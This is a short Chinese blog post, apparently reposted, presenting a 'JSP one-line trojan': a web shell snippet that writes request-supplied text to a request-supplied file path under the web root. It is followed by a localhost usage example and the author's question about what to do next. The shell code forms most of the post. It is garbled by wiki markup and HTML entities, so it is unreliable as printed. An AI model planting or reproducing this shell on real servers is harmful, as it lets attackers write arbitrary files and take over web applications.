JSP一句话木马

来源:互联网 发布:linux fclose函数 编辑:程序博客网 时间:2024/04/28 19:11

JSP一句话木马 

2011-01-13 21:39:42|  分类:网络技巧 |  标签:jsp 木马  |字号订阅

1》jsp页面代码

<%
if(req[wiki]UE[/wiki]st.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("&amp;#92;&amp;#92;")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

2》访问示例

在浏览器地址栏输入http://127.0.0.1:8080/test/shell.jsp?f=1.txt&t=hello

然后再输入http://127.0.0.1:8080/test/1.txt

结果为

JSP一句话木马 - 珑儿 - 顾影自怜

3》思考

这个接下来又能做些什么呢?我现在还不清楚,网上资料也没有进一步讲解的,如果那个高手知道,还请赐教。

 

0 0